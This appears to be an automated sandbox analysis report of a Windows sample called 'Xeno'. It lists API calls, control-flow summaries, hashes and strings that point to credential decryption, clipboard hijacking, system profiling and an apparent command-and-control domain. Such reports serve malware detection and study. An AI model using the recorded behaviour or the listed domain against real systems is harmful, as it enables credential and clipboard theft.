                            Execution graph (rendered graph data, not reproduced). API calls reachable in the graph, by component: CoSetProxyBlanket (434848, 4308ad, 43a3eb); LdrInitializeThunk (43e7c0, 4419e0, 41e140, reached from many sites); heap routines RtlAllocateHeap (43d0aa), RtlFreeHeap (43d0da) and RtlReAllocateHeap (43e79b); CryptUnprotectData (414eb3) with FreeLibrary (418b33, 418b75, 43e725); GetForegroundWindow (43ea70, 4085bd); RtlExpandEnvironmentStrings (42411d, 4241e8, 4120f8, 4123ab); GetSystemMetrics twice (4351fe) and SelectObject twice (435241, 43530d); LoadLibraryExW (409b09); CoUninitialize (40d36f); the clipboard loop at 3271000 (Sleep, OpenClipboard, GetClipboardData, GlobalLock, GlobalAlloc, GlobalUnlock, EmptyClipboard, SetClipboardData, GlobalFree, CloseClipboard, GetClipboardSequenceNumber); CreateThread (413457); GetPhysicallyInstalledSystemMemory (42d26e); GetComputerNameExA (42e4b8); GetUserDefaultUILanguage (438263); the entry routine at 408570 (GetCurrentProcessId, GetCurrentThreadId, SHGetSpecialFolderPathW, GetForegroundWindow, CoInitializeEx at 40c6e0, ExitProcess at 4087d7); CoInitializeSecurity twice (40c733); and the COM/WMI query routine at 439fe0 (CoCreateInstance, SysAllocString, CoSetProxyBlanket, VariantInit, VariantClear, SysFreeString, GetVolumeInformationW).

                            Control-flow Graph

                            Control-flow graph of 4351d0-4355e9 (rendered graph data, not reproduced): 2 basic blocks; GetSystemMetrics is called twice in 4351d0-4352a3 and SelectObject twice in 4352aa-4355e9.
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: MetricsObjectSelectSystem
                            • String ID: $0[C$0[C$0[C$0[C$0[C$0[C$0[C$0[C$0[C$0[C$0[C$0[C$0[C$0[C$0[C$C[C$FZC$N\C$WVC$VC
                            • API String ID: 34426039-2778685088
                            • Opcode ID: c6127f7c9a7db46ddcd5acb7facf3fdfd5e3f223cce4bf4a7d6d21d36c9f5c7d
                            • Instruction ID: 37510dccdf2992e2c9b29f1aa8d032c624b90efb5f61db50743147bc3c231a18
                            • Opcode Fuzzy Hash: c6127f7c9a7db46ddcd5acb7facf3fdfd5e3f223cce4bf4a7d6d21d36c9f5c7d
                            • Instruction Fuzzy Hash: BA914BB040E3888FE360DF25D59978ABBE0BB85708F408D1EE5C86B350D7B95549CF9A

                            Control-flow Graph

                            Control-flow graph of 439fe0-43a9db (rendered graph data, not reproduced): 107 basic blocks. API call sites: CoCreateInstance (43a306-43a34c), SysAllocString (43a3ba-43a3e5, 43a468-43a4df, 43a4f6-43a52d), CoSetProxyBlanket (43a3eb-43a405), VariantInit (43a56f-43a5ba), VariantClear (43a835-43a842), SysFreeString (twice in 43a850-43a868, once in 43a876-43a883) and GetVolumeInformationW (43a887-43a8b0, a direct successor of the CoCreateInstance block). Internal calls: 440310, 41c5a0, 407ef0, 407e70, 407ea0, 407e80.
                            APIs
                            • CoCreateInstance.OLE32(8123,00000000,00000001,6E696866,00000000), ref: 0043A344
                            • SysAllocString.OLEAUT32(FB35F90A), ref: 0043A3BF
                            • CoSetProxyBlanket.COMBASE(7C0014E6,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043A3FD
                            • SysAllocString.OLEAUT32(BA74C46C), ref: 0043A46D
                            • SysAllocString.OLEAUT32(20EE22FA), ref: 0043A4FB
                            • VariantInit.OLEAUT32(?), ref: 0043A577
                            • SysFreeString.OLEAUT32(?), ref: 0043A85D
                            • SysFreeString.OLEAUT32(?), ref: 0043A866
                            • SysFreeString.OLEAUT32(00000000), ref: 0043A877
                            • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0043A8AC
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: String$AllocFree$BlanketCreateInformationInitInstanceProxyVariantVolume
                            • String ID: -+$8123$?<="$RF$[7c1$fhin$><
                            • API String ID: 2247799857-3939988329
                            • Opcode ID: cc43a5e8769069c2abc748004715bf8a30ae397afc363c7177e75218d5b14933
                            • Instruction ID: f7c8668c6c170ee04320f3cb6f32d1bae6488c369456c635581b34e5eb8f4306
                            • Opcode Fuzzy Hash: cc43a5e8769069c2abc748004715bf8a30ae397afc363c7177e75218d5b14933
                            • Instruction Fuzzy Hash: 7D42DE756483409BD314CF28C88179BBBE5EBDA314F18892DE4D88B391D779D806CB97

                            Control-flow Graph

                            Control-flow graph of 433a7f-433d34 (rendered graph data, not reproduced): 8 basic blocks, no API calls; block 433c83-433cfc calls 409890 twice.
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: $"$$$&$($*$,$.$6$8$9$:$<$>$P$R$T$V$f$h$i$j$l$n
                            • API String ID: 0-3154370701
                            • Opcode ID: f29e427968f2698b34fade096516cde7f0b83e21bb67be7bc55876a38738c241
                            • Instruction ID: 8bc486cfdb77a11598ff77e935415ce7041ec80f5835c8c55f7d3a8c14c5f753
                            • Opcode Fuzzy Hash: f29e427968f2698b34fade096516cde7f0b83e21bb67be7bc55876a38738c241
                            • Instruction Fuzzy Hash: 5671492150D7C18AE336CB38885879FBFD16BA6224F084B9EE4E95B3C2C7B94505C767
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: $ $@$M$`$c$k$l$n
                            • API String ID: 0-1497278038
                            • Opcode ID: 6ce7881244ee3f3c6d83cd5758f682a7359dd4535b671493cc5648675134ef53
                            • Instruction ID: e46d7091698a58886afb1e4fac79fefe2b8030fbae7e861d81af1935b7471b64
                            • Opcode Fuzzy Hash: 6ce7881244ee3f3c6d83cd5758f682a7359dd4535b671493cc5648675134ef53
                            • Instruction Fuzzy Hash: 2A1323719083908FCB14DF38C94539EBFF1AB56320F1986AED4A99B3D2D3388945CB56

                            Control-flow Graph

                            APIs
                            • Sleep.KERNELBASE(00000001), ref: 03271032
                            • OpenClipboard.USER32(00000000), ref: 0327103C
                            • GetClipboardData.USER32(0000000D), ref: 0327104C
                            • GlobalLock.KERNEL32(00000000), ref: 0327105D
                            • GlobalAlloc.KERNEL32(00000002,-00000004), ref: 03271090
                            • GlobalLock.KERNEL32 ref: 032710A0
                            • GlobalUnlock.KERNEL32 ref: 032710C1
                            • EmptyClipboard.USER32 ref: 032710CB
                            • SetClipboardData.USER32(0000000D), ref: 032710D6
                            • GlobalFree.KERNEL32 ref: 032710E3
                            • GlobalUnlock.KERNEL32(?), ref: 032710ED
                            • CloseClipboard.USER32 ref: 032710F3
                            • GetClipboardSequenceNumber.USER32 ref: 032710F9
                            Memory Dump Source
                            • Source File: 00000001.00000002.2943213934.0000000003271000.00000020.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: true
                            • Associated: 00000001.00000002.2943200800.0000000003270000.00000002.00000800.00020000.00000000.sdmp
                            • Associated: 00000001.00000002.2943225685.0000000003272000.00000002.00000800.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_3270000_Xeno.jbxd
                            Similarity
                            • API ID: ClipboardGlobal$DataLockUnlock$AllocCloseEmptyFreeNumberOpenSequenceSleep
                            • String ID:
                            • API String ID: 1416286485-0
                            • Opcode ID: 2726ed36bf27a58687548f9cffe08c55d112116dc5efecfb79682deda04e8f26
                            • Instruction ID: 5e3cc20b861b6d2ac3c4071c97eb09f4c97daecbe06001ccb60155c2deef2a7d
                            • Opcode Fuzzy Hash: 2726ed36bf27a58687548f9cffe08c55d112116dc5efecfb79682deda04e8f26
                            • Instruction Fuzzy Hash: 92218631614351DBD7207B72BC0DB6AB7ECFF04751F088868F945D6155E7719850C7A1

                            Control-flow Graph

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: &,&#$;$C?1*$N$p$v8*+$VA
                            • API String ID: 0-127065759
                            • Opcode ID: a1caf71b882f4878180087479312a2e2d355371028670d5d4e42b8ab7061173d
                            • Instruction ID: fd0f427f2008a2c0edfbd6141d10ccd6f3fdcb781c1167f549041c6f638f69ce
                            • Opcode Fuzzy Hash: a1caf71b882f4878180087479312a2e2d355371028670d5d4e42b8ab7061173d
                            • Instruction Fuzzy Hash: F45227B6A08740DFD7248F24D8517AB77E2EFD5314F18893EE49987351E7389881C786

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: Uninitialize
                            • String ID: ,$@C$C]$IP$ZV$sobrattyeu.bond${A$QS
                            • API String ID: 3861434553-683654926
                            • Opcode ID: eb15df639867500a9facb8c81cb763dac1420069da39424e71037901060fffb5
                            • Instruction ID: 6a083f237194b953a348a5db904179e6b3350956d12e98a5709cea8039accc4e
                            • Opcode Fuzzy Hash: eb15df639867500a9facb8c81cb763dac1420069da39424e71037901060fffb5
                            • Instruction Fuzzy Hash: A8A1BE7050D3D18BD325CF29D4907EBBFE1AFE6304F28496ED4D95B286CB38450A8B96

                            Control-flow Graph

                            APIs
                            • GetCurrentProcessId.KERNEL32 ref: 00408594
                            • GetCurrentThreadId.KERNEL32 ref: 0040859D
                            • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408644
                            • GetForegroundWindow.USER32 ref: 00408659
                            • ExitProcess.KERNEL32 ref: 004087D9
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                            • String ID: `Abc
                            • API String ID: 4063528623-3897226799
                            • Opcode ID: 9e3a798af9976ded4a535906874f74240b22633e599025efaf28ccb3e8e8a28d
                            • Instruction ID: d19e78807b624985901526984c6b7ab3fbf55d5db797ab1e363f5c364b002356
                            • Opcode Fuzzy Hash: 9e3a798af9976ded4a535906874f74240b22633e599025efaf28ccb3e8e8a28d
                            • Instruction Fuzzy Hash: C7518D73A443084BD7086FB5CD46357BAD69BC4714F1ED03EA985EB3D2EE789C068688

                            Control-flow Graph

                            APIs
                            • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042D279
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: InstalledMemoryPhysicallySystem
                            • String ID: V$]P>l$?O]
                            • API String ID: 3960555810-986093314
                            • Opcode ID: dec4f2b3383ebcc5747113049a67f21b24f36a02f8ef1ff504895b1b580e203f
                            • Instruction ID: efb6400d5338d83f01aaac8210cccbf9c494b2705186651a68766c945847a6df
                            • Opcode Fuzzy Hash: dec4f2b3383ebcc5747113049a67f21b24f36a02f8ef1ff504895b1b580e203f
                            • Instruction Fuzzy Hash: C2A1C47090C3A28BD735CF2994507ABBFE0AFD6300F14896ED8D997342D7798905CB96

                            Control-flow Graph

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID: XQ1*$\Q1*$+
                            • API String ID: 0-3041387894
                            • Opcode ID: 34a1d91bb7c21f1186d8d0208b333f4450ba949009058a808821d030a3be046d
                            • Instruction ID: 5895d2294c971f8e2034238f20f2f79def80611cb6709990aaa7653370ceb720
                            • Opcode Fuzzy Hash: 34a1d91bb7c21f1186d8d0208b333f4450ba949009058a808821d030a3be046d
                            • Instruction Fuzzy Hash: A6516F71E043048BDB289F28DC41737B3D1E789724F15963EE896DB3D1E6359C018789

                            Control-flow Graph

                            APIs
                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 00424151
                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 004241FB
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: EnvironmentExpandStrings
                            • String ID:
                            • API String ID: 237503144-0
                            • Opcode ID: 1759296bc14cd31225a9e57bae9c937f51eab8db115243470aa6628af3cbd0ca
                            • Instruction ID: 3f2aac39c58a3c97088cc2a5e0a6a6a04ed8071c8649e1c1d59fee9b7a36d9e8
                            • Opcode Fuzzy Hash: 1759296bc14cd31225a9e57bae9c937f51eab8db115243470aa6628af3cbd0ca
                            • Instruction Fuzzy Hash: 9E7124766183109FE710CF64E88175BB7E1FBD5304F09892DE8958B281DBB89D19CB86

                            Control-flow Graph

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID: 6016$b
                            • API String ID: 2994545307-864413770
                            • Opcode ID: 36b91a3189f51834b54774234e3f110313e053a56aaa5c52519ffc9606486525
                            • Instruction ID: 60cf8f15a9338521a9cead3a08613a9893755147c15dde7275904bfc6ceef081
                            • Opcode Fuzzy Hash: 36b91a3189f51834b54774234e3f110313e053a56aaa5c52519ffc9606486525
                            • Instruction Fuzzy Hash: 44817975B0C3208BD724DF65AC82B7B72A1EF91314F58857EE88557381E63D9C05C3AA
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID: QTUJ
                            • API String ID: 2994545307-1753559080
                            • Opcode ID: 994dc7504d864a574c716f2409e68564ac414f5aa7d1abaeb04d8d92da28722f
                            • Instruction ID: a6bfa4cb9190ef89da1edd16953e4f37e99d24ac172dc86594cb06b59e4c51cb
                            • Opcode Fuzzy Hash: 994dc7504d864a574c716f2409e68564ac414f5aa7d1abaeb04d8d92da28722f
                            • Instruction Fuzzy Hash: AC7138317043009BE7149E28D88157BB7E6EBD6364F29863EE8A9873A0DB34DC41C745
                            APIs
                            • LdrInitializeThunk.NTDLL(0044184E,00000002,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043E7EE
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                            • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                            • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                            • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID: @
                            • API String ID: 2994545307-2766056989
                            • Opcode ID: daf3b4b16eeee25848154daeb322f5852c497ad596691eb790aade3001df0475
                            • Instruction ID: 6f6c610495a8cf5583b4b78827772468214e1a405ea1080edbc4c8d404d54428
                            • Opcode Fuzzy Hash: daf3b4b16eeee25848154daeb322f5852c497ad596691eb790aade3001df0475
                            • Instruction Fuzzy Hash: 6B2126715043049BD3248F58D8C166BB7B4EFC6328F149A2DEA68473E0D375EC188B9A
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 7fcc8bf6b42205e054cb748db94477577ebffda38a4dba77b302bc76d671e357
                            • Instruction ID: 640ba1ecf7e0c10ea4151d91a41ac0e0275706c2e5c36ad65190f80b20dac650
                            • Opcode Fuzzy Hash: 7fcc8bf6b42205e054cb748db94477577ebffda38a4dba77b302bc76d671e357
                            • Instruction Fuzzy Hash: 8F9128317043018BE718CF28C891AABB7E2EB99314F18893DEAD987391D739DC259755
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7e278b260ade7824607e9d206bf0c740a5cec33b05fb21e759bb6a9a0670049a
                            • Instruction ID: adab23953f27aebbb049cdd987770b1f90da96ac25c409cb70e848a80435e597
                            • Opcode Fuzzy Hash: 7e278b260ade7824607e9d206bf0c740a5cec33b05fb21e759bb6a9a0670049a
                            • Instruction Fuzzy Hash: DF31E3B9B416205BEA19B7126C02B6F31129F96318F84443EE94A272C3DF386E16C59F

                            Control-flow Graph

                            APIs
                            • LoadLibraryExW.KERNEL32(?,00000000,sxqv), ref: 00409B0D
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: LibraryLoad
                            • String ID: sxqv
                            • API String ID: 1029625771-2372826424
                            • Opcode ID: 41c06041e0e38053a927aaef49ab051c74f3da675d7b257a0c37e5318a08c64d
                            • Instruction ID: 3c90811a730d97c9f70ff0ce875c621cd4626f5dabf1d0d0a982c9b16815e371
                            • Opcode Fuzzy Hash: 41c06041e0e38053a927aaef49ab051c74f3da675d7b257a0c37e5318a08c64d
                            • Instruction Fuzzy Hash: 5611027861D3804FD308DF7598A136BBBD2ABE7308F14953CD1C61B682CA349A07CB4A

                            Control-flow Graph

                            APIs
                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C745
                            • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C762
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: InitializeSecurity
                            • String ID:
                            • API String ID: 640775948-0
                            • Opcode ID: 67aaadf7b2c6effd7333e2589bfdeb0d24503ba00c0acad404c75bfdd4500518
                            • Instruction ID: ffbb97b94142b95e40fd922bbd7dc9ea267b421aa0676adc11c1963fdb964269
                            • Opcode Fuzzy Hash: 67aaadf7b2c6effd7333e2589bfdeb0d24503ba00c0acad404c75bfdd4500518
                            • Instruction Fuzzy Hash: 42E042393C83117AF6785B54AC57F1532156786F26F344328B7267E6E48AE07201450C
                            APIs
                            • GetComputerNameExA.KERNELBASE(00000005,3ACDD1F1,00000100), ref: 0042E5B1
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: ComputerName
                            • String ID:
                            • API String ID: 3545744682-0
                            • Opcode ID: 2539a9e9dd58733bd3f21d17fe2e52e1f39e62af0e6fa279351ba15a7e634051
                            • Instruction ID: fea5c588f6da4bb7086d61572e48acdd5d99848bfea760ffdd15ae91ae24ac3c
                            • Opcode Fuzzy Hash: 2539a9e9dd58733bd3f21d17fe2e52e1f39e62af0e6fa279351ba15a7e634051
                            • Instruction Fuzzy Hash: BE21683560C7E28AE724CB36D8903EBBBD19FC7314F08896DC8C997381DB7848068B52
                            APIs
                            • GetComputerNameExA.KERNELBASE(00000005,3ACDD1F1,00000100), ref: 0042E5B1
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: ComputerName
                            • String ID:
                            • API String ID: 3545744682-0
                            • Opcode ID: 8925056dd1b6fdef5a8cc41609ebd461170edc28ac5a7c513c5d7bebeb94d8be
                            • Instruction ID: 26532c79b15e5d0279687e1095ae653c396a650c36185ecb558b499c03813a00
                            • Opcode Fuzzy Hash: 8925056dd1b6fdef5a8cc41609ebd461170edc28ac5a7c513c5d7bebeb94d8be
                            • Instruction Fuzzy Hash: 58213A7561C7918BE724CB35C8903A77BD1AFC6314F14892DD8CD97340EB7848068B43
                            APIs
                            • GetUserDefaultUILanguage.KERNELBASE ref: 00438269
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: DefaultLanguageUser
                            • String ID:
                            • API String ID: 95929093-0
                            • Opcode ID: ab92d2045c8177a4efff73225cea8338981622d2990fe4a47dd2cec30961f5f7
                            • Instruction ID: 2e34f4c7f52991740cc3dbe09e53d2cd4b76e31f64b16223ebf34019563e4dae
                            • Opcode Fuzzy Hash: ab92d2045c8177a4efff73225cea8338981622d2990fe4a47dd2cec30961f5f7
                            • Instruction Fuzzy Hash: 6F11E6349097948FDB25CF3888907DEBBB1AF4A310F1442ECD89A97392DA384D41CF01
                            APIs
                            • RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,00000000), ref: 0043E7A0
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: 980b3dac78a713323bf0f9bec34d0305644687b8d571e5a1f269da46dcaf4b9b
                            • Instruction ID: 3d6f13fefae88292eb4089c4d4d66f36609fe718f901965f6693123b5cd12a0c
                            • Opcode Fuzzy Hash: 980b3dac78a713323bf0f9bec34d0305644687b8d571e5a1f269da46dcaf4b9b
                            • Instruction Fuzzy Hash: CBF0F6BA905615EFD2102B26BC46F6B3A6CEF8AB69F011439B40067152DA29D81185BA
                            APIs
                            • GetForegroundWindow.USER32 ref: 0043EA70
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: ForegroundWindow
                            • String ID:
                            • API String ID: 2020703349-0
                            • Opcode ID: 2036146d754ae92f21516d315a098be326d96b4be75a9a389b9b2afa63f75a35
                            • Instruction ID: 662c8fbebb6e15e14487a4a0d3994ac799f71c1ef069e298411c082116b7f70f
                            • Opcode Fuzzy Hash: 2036146d754ae92f21516d315a098be326d96b4be75a9a389b9b2afa63f75a35
                            • Instruction Fuzzy Hash: 7FF0A0BA915081CFE701DF65E86166B77A0FB5B310F0818B9D142D7392DA28A842EB59
                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: BlanketProxy
                            • String ID:
                            • API String ID: 3890896728-0
                            • Opcode ID: 9955c8f2bcb6e9f8e1275c62baf31b7d3665ec856aec3dde1247f3b00b4649f3
                            • Instruction ID: 4746e495412e1d37ff3d363b9c31ec30260a673917b22222d80bf90cc70a48fd
                            • Opcode Fuzzy Hash: 9955c8f2bcb6e9f8e1275c62baf31b7d3665ec856aec3dde1247f3b00b4649f3
                            • Instruction Fuzzy Hash: 0FF0F97461D3418FE315DF24C4A575FBBE4AB88708F00892DE88487392C7B99A498F82
                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: BlanketProxy
                            • String ID:
                            • API String ID: 3890896728-0
                            • Opcode ID: 339aa804d34895b566fad6150f776b04d497913f157a49fb7abe7ecf72bed1a8
                            • Instruction ID: 331f64c32d35e4e16998dbad61f85cc240b661241795b965d68c18051cf29eb0
                            • Opcode Fuzzy Hash: 339aa804d34895b566fad6150f776b04d497913f157a49fb7abe7ecf72bed1a8
